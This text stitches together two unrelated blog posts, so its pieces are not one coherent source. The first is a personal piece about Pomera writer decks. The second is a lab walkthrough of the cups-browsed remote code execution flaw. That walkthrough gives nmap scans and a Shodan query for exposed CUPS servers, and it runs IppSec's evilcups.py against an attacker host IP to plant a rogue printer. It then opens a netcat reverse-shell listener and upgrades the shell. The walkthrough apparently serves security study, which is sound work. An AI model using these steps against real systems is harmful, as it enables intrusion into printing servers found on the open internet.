Exploring the World of Writer Decks

What is a Writer Deck?

Today, we’re diving into a fascinating, fast-growing niche in the tech world: Writer Decks. The best definition of these unique devices comes directly from the passionate r/writerDeck community itself:

“Single-purpose, distraction-free writing devices of all types—DIY and mass-produced. Basically, cyberDecks built specifically for writing, such as the Alphasmart Neo or Astrohaus Freewrite (or the O.G., typewriters). Discuss your favorites, show off your builds, whatever!”

In a world completely saturated by digital noise, having a device dedicated purely to the written word feels like the ultimate productivity hack. There’s something incredibly freeing about focusing on a single task without the temptation of incoming notifications, social media pings, or endless browser tabs. It pulls you out of a passive scroll and makes the act of writing feel intentional, rhythmic, and even meditative.

The Encounter

My first real encounter with a writer deck came from a video by productivity creator James Scholz titled “Tech I Use to Stay Productive!” Around nine minutes in, he showcased a device that immediately stopped me in my tracks: a "Pomera" writer deck, specifically the King Jim Pomera DM250 Digital Memo.

I was instantly captivated. Scholz described how utilizing a dedicated tool like this enhances his journaling process, adding a layer of deliberate romanticism to daily writing that I hadn’t really considered before. No desktop distractions, no blue-light sensory overload—just a purpose-built tool for words. I loved everything about the concept.

Having followed James Scholz for years, I’ve always been intrigued by his deep appreciation for quirky, retro-inspired hardware. His choice of the DM250 sparked my curiosity, and soon enough, I was down a rabbit hole researching everything about it.

The specific model he showcased was the incredibly rare, limited-edition Pomera DM250 "Crystal"—a transparent, see-through chassis that channels a perfect nostalgic, cyberpunk aesthetic. True to form for Scholz's unique finds, it's a legendary collector's piece.

Navigating the Market

Fired up by the video, I immediately headed to eBay to check out the price range for the DM250.

 

To my shock, a recent listing for a mint condition model was sitting at over $1,000! While I’d initially been dead-set on hunting down that beautiful transparent Crystal edition, its sheer exclusivity and skyrocketing collector price quickly snapped me back to reality. I pivoted my search toward the standard, dark gray Pomera DM250 instead.

Interestingly, these simple, hyper-focused devices command an incredibly high resale value. At the time of my search, global availability was sparse, with roughly 97 units listed worldwide—almost all located natively in Japan. Buying one means factoring in international shipping and import taxes.

The Game Changer: The Official US Release

Just as I was resigned to dealing with international proxy shipping and an entirely Japanese keyboard layout, I discovered some massive news for the writer deck community. King Jim officially launched a localized Western version: the Pomera DM250US.

Initially debuting via a crowdfunding campaign, it is now available directly through King Jim’s US storefront.

At a retail price of $499, it is a steep investment for a text-only machine—placing it right in competition with premium alternatives like the Astrohaus Freewrite Traveler. However, for a lot of writers, the quality-of-life upgrades make it worth the price premium over a Japanese import:

• Native US Layout: No more hunting for punctuation or dealing with a cramped, shifted spacebar designed for Japanese input.

• English Firmware & Features: The software is fully localized, complete with live English word counts, split-screen document comparison, and an active spell-check (which highlights typos with a nice pop of color on the LCD screen).

• Worry-Free Shipping: It ships natively, bypassing the gamble of surprise import taxes and customs delays.

 

I hope you found this deep dive into the world of writer decks as intriguing as I did! For more examples and discussion on these devices, check out the r/writerDeck community.

And lastly, a huge thanks to James Scholz, whose content has inspired my interest in this niche tech for years.

Attacking UNIX systems via CUPS

CUPS is a modular printing system for Unix-like computer operating systems which allows a computer to act as a print server. This vulnerability was discovered by Evilsocket (Simone Margaritelli).

https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8 

 

PoC: RCE

Let’s assume our target host is 10.10.11.40. We can conduct enumeration using Nmap with the following command: 

Sudo nmap -sC -sV -vv -oA nmap/evilcups 10.10.11.40 

This command utilizes the default Nmap scripts for service detection and increased verbosity. The -oA nmap/evilcups option directs Nmap to save the scan results in a file named "nmap/evilcups". 

The scan reveals a Debian machine with port 22 open, along with the Internet Printing Protocol (IPP) listening on port 631, indicating it is running CUPS 2.4. A web server is hosted on this interface, displaying the title "Home – CUPS 2.4.2." We can access it at http://10.10.11.40 in our browsers.

 

As we can see, the default CUPS management interface is exposed.

[!] Note that it is effortless to search for instances where this interface is exposed on the open web. This can be done by heading to Shodan and searching:

  port:631 "CUPS"

Using an IP address from the results in Shodan, such as x.x.x.x:631, we can successfully bring up the CUPS management interface for these targets. 

Let's pivot back to our PoC for now. Currently, we are accessing this instance as an “anonymous user.” While we lack administrative privileges, we can still view the printers.  

 

Actions that we can conduct from here include viewing the jobs associated with this printer and printing a test page. Note that we cannot delete or modify printers at this time, as we are not an administrator. 

The next step is to run the command: 

sudo nmap -sU -p 631,632 10.10.11.40  

This command instructs nmap to perform a UDP scan on the target host. It is specifically checking ports 631 and 632. Here is the result: 

 

Note that Evilsocket has detailed the main CVEs associated with this vulnerability here. 

 

Also, we can view the reported vulnerability on GitHub. 

 

Another version of this code has been made available to us by IppSec:

https://github.com/ippsec/evil-cups

IppSec has made a few improvements to this POC, and as such, I will be talking about this script. It can be run with:

python evilcups.py [my host IP] [target host IP]

Let’s dig into that script a bit:

 

This function is responsible for sending our UDP packet to our target host. In this script we are sending up our specified attributes.

An interesting part of this script is:

 

This line begins with a single quote. This results in a blank variable being inserted during our request. To get a better understanding of our packet we can visit Apple.com

 

After “evilcups.py” is executed, when we refresh the CUPS interface from earlier (http://10.10.11.40), we can see that we have added a new printer under the name we specified ("HACKED"): 

 

A reverse shell can be crafted with: nc -lvnp 9001. Here we use netcat to listen over port 9001. Next, click into this newly added printer and print a test page. By doing this we utilize the “FoomaticRIPCommandLine” section of IppSecs code, consequently spawning a shell. 

 

Upgrading the shell is done with:

python -c 'import pty;pty.spawn("/bin/bash")'

Note that this command creates a bash shell session where a standard shell might not be available, e.g. a remote access session like this one.

After that, we can execute the command:

stty raw-echo;fg

This command sets the terminal to 'raw' mode and brings the background job to the foreground. Subsequently, a reverse shell as the "lp" user is established at this point.

The "Fix"

We can head to the cups-browsed Git repo and see the change brought in as a result of this vulnerability.

https://github.com/OpenPrinting/cups-browsed/commit/1debe6b140c37e0aa928559add4abcc95ce54aa2

 

Closing

Something I found interesting was how turbulent the reporting process was for Evilsocket. They go into more detail about it in their block but essentially, this issue was quite difficult to report despite being so dangerous. Furthermore, he explains that his initial report if this finding was leaked!

Thank You

I want to thank you for reading this article, IppSec for the wonderful documentation, and Evilsocket (Simone Margaritelli) for sharing their findings surrounding this vulnerability!

https://www.evilsocket.net/
https://www.linkedin.com/in/ippsec/